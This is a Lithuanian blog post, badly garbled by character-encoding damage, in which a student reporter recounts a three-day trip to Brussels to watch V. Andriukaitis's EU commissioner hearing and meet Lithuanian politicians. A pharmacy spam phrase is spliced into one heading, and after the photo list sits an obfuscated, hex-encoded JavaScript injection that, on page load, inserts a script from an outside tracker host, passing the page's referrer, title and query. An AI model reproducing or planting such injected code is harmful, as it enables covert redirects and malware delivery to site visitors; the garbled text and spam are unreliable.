KelionA� A? BriuselA? a�� naujos galimybA�s ir patirtis

GrupA� Lietuvos A?urnalistA? bei aktyviausi jaunuoliai iA? Lietuvos tapo Lietuvos kandidato A? ES komisarus V. AndriukaiA?io palaikymo komanda vykusiame klausymA? stebA�jime. Projekto a�zPilieA?iai reporteriaia�? labiausiai pasiA?ymA�jusios 3 merginos taip pat turA�jo galimybA� aplankyti Briuselyje esantA? Europos ParlamentA�.

KelionA�s trukmA� a�� vos 3 dienos, per kurias atrodA�, jog turbA�t neA?manoma labai daug nuveikti ir patirti, taA?iau A?A? kartA� tokius nusistatymus nuvijo A? A?onA� kelionA�s vadovA? sudaryta programa. MA�sA? planuose buvo iA?vardinta 10 Lietuvos politikA?, su kuriais buvo suorganizuoti pokalbiai. SA�raA?as iA? ties spalvingas a�� V. Mazuronis, R. Karoblis, B. RopA�, A. PranckeviA?ius, G. Landsbergis, V. BlinkeviA?iA�tA�, P. AuA?treviA?ius, A. Saudargas, Z. BalA?ytis. TaA?iau, vienas iA? pagrindiniA? kelionA�s tikslA? a�� V. AndriukaiA?io klausymA? stebA�jimas.

Pirmadienis, RugsA�jo 29 d.

KelionA�s metu A? Vilniaus oro uosta, sA�dA�dama traukinyje vis bandA?iau A?sivaizduoti A?ios netikA�tai a�zlaimA�tosa�? kelionA�s eigA� ir bA�simus A?spA�dA?ius. Buvo A?domu ne tik kaip atrodo pats Briuselis ar EP taA?iau ir su kokiais A?monA�mis teks keliauti, nes deja, visas pateiktas sA�raA?as pavardA?iA? atrodA� svetimas. Visgi tokia galimybA� iA?vykti A? kitA� A?alA? dA�l aktyvumo projekte atrodA� utopinA� ir labai jaudinanti. PamaA?u A? galvA� lindo mintys, kaip man pasisekA�, jog metA? pradA?ioje buvau pastA�mA�ta sudalyvauti projekte a�zPilieA?iai reporteriaia�?. A�iandien aA? labai dA?iaugiuosi, jog A?alia manA�s buvA� kolegos tikA�dami manimi ir mano galimybA�mis raA?yti A?traukA� A? A?A? projektA�, kadangi nauji A?spA�dA?iai, patirti per A?iuos metus yra neA?kainojami, o ir A?i kelionA� atvA�rA� akis.

Sutartu laiku susitikus su visais bA�simais bendrakeleiviais jaudulys A?iek tiek sumaA?A�jo, iA?vydus jau matytus veidus a�� vienA� iA? projekto organizatoriA? B.Jankauskas ir mokymuose dalyvavA�s lektorius R.Pagorelis.

Apie 20h lA�ktuvas nusileido Briusely, kuris tuo metu atrodA� tarsi neA?manomas, naujA?jA? laikA? kA�rinys a�� modernus, A?ibantis ir toks nematytas. KelionA� autobusu A? vieA?butA? tapo bene geriausiu mano A?ios kelionA�s prisiminimA?.

Antradienis, RugsA�jo 30 d.

Pakilus iA? lovos gana anksti, kartu su grupe lietuviA? iA?skubA�jome A? EP vykstantA? V.AndriukaiA?io klausymA? stebA�jimA�. TiesA� pasakius, keista buvo bA�ti patalpoje (didA?iojoje salA�je), kuriA� tiek kartA? teko matyti nuotraukose ar televizijos ekrane. Apsilankymas ten, taip pat atsakA� A? viduje daugelA? metA? kirbA�jusA? klausimA� a�� kaip visi europarlamentarai tarpusavyje konferencijose susiA?neka. A?inoma, galbA�t tai ir kvaila, taA?iau iA? ties dauguma jaunA? A?moniA? net neA?sivaizduoja, kaip vyksta tokio pobA�dA?io darbas. PrasidA�jus V.AndriukaiA?iA? kalbai, A? darbA� kartu A?sijungA� ir vertA�jai, kuriuos kiekvienas galA�jo girdA�ti uA?sidA�jA�s ausines esanA?ias A?alia.

Kalbant apie patA? klausymA? stebA�jimA�, mano nuomone, V.Andriukaitis pasirodA� gana gerai, A?inoma, galima A?A?velgti kabliukA?, prie kuriA? galima prikibti, taA?iau nors ir apibendrintai, nelabai konkreA?iai kalbA�damas politikas susilaukA� tiek A?urnalistA?, tiek ir kitA? politikA? simpatijA? ir buvo A?vertintas labai gerai.

VisA� laikA�, klausA� ir sunkiai dirbA� A?urnalistai, iA? dalies atbaidA� mintis kada nors paA?iai siekti A?urnalisto karjeros. Matydama, kaip A?ie A?monA�s, klausydami iA? karto bando raA?yti straipsnius, tuo paA?iu metu publikuoja nuotraukas, kad tik kuo greiA?iau visuomenA� gautA? informacijA�, susilaukA� ne tik mano gailesA?io, taA?iau ir pagarbos. Tik savo akimis pamaA?ius tuo metu dirbanA?ius A?urnalistus galA�jau A?vertinti jA? darbA� ir suprasti, koks jis yra sudA�tingas.

Dienos eigoje susitikus su V. Mazuroniu ir R. Karobliu pagrindinA� tema buvo V. AndriukaiA?io atsakymai. Ambasadorius R. Karoblis taip pat supaA?indino ir suteikA� daugiau informacijos apie padA�tA? Ukrainoje.

TreA?iadienis, Spalio d.

TreA?iadienis buvo paskirtas susitikimams su dar 7 politikais. Vertint kiekvieno iA? jA? nesinorA�tA?, taA?iau, dA?iaugiuosi galimybe susitikti su A?iais A?ymiais A?monA�mis realiame gyvenime ir savo akimis pamatyti, kaip jie bendrauja, jA? pliusus bei minusus. TA� kartA�, A? aktyvias diskusijas nesitraukiau, uA?A�miau stebA�tojo pozicijA�, kuri man leido pastebA�ti, jog Lietuvos politikA? tarpe gausu iA? ties protingA?, humaniA?kA? A?moniA?, kuriems rA�pi jA? darbas, taA?iau ir tai, kokie arogantiA?kai kai kurie iA? jA? yra.

Kalbant apie politikA? tarpe vykstantA? darbA�, buvau nusivylusi tais paA?iais uA?duodamais klausymais ir jA? nepagarbA? nesiklausymA� kalbanA?iA?jA? dienos eigoje.

A�spA�dA?iai Briuselyje is pharmacy rx one legit.

Kaip jau ir minA�jau, pirmieji prieA? mano akis pasirodA� Briuselio vaizdai buvo iA?ties nepakartojami, taA?iau, su kiekviena papildoma valanda praleista ten, mano nuomonA� keitA�si. CentrinA� gatvA�, EP pastatai iA? ties sutvarkyti ir graA?A�s akiai, taA?iau elementarios gatvelA�s prieA? juos nublankdavo. Miestas esantis senA?, pradA�tA? renovuoti ir nebaigtA?, pastatA? apsupty nA�ra toks A?spA�dingas, koks gali bA�ti pateikiamas nuotraukose. A?monA�s gatvA�je, lyginant su kitomis A?alimis taip pat ganA�tinai atstumiantys ir nemalonA�s bendravimui a�� skubantys, pikti.

Apibendrinus A?iA� kelionA�, negalA�A?iau teikti, jog ji nebuvo A?spA�dinga ir duodanti naudos. Jos metu supratau, jog A?urnalistika visgi ne man, o patirtis a�� neA?kainojama. A?inoma, galima manyti, jog tokie dalykai, kai nustebinA�s A?moniA? A?altumas, atA?iaurumas, Briuselio vidinA� miesto bA�klA�, nuteikA� mane matyti ir vertinti A?iA� kelionA� neigiama, taA?iau tai, visgi neprilygsta visom galimybA�ms sukurtoms A?ios kelionA�s organizatoriA?.

SAM_0043SAM_0054SAM_0057SAM_0058SAM_0060SAM_0062SAM_0064SAM_0065
var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *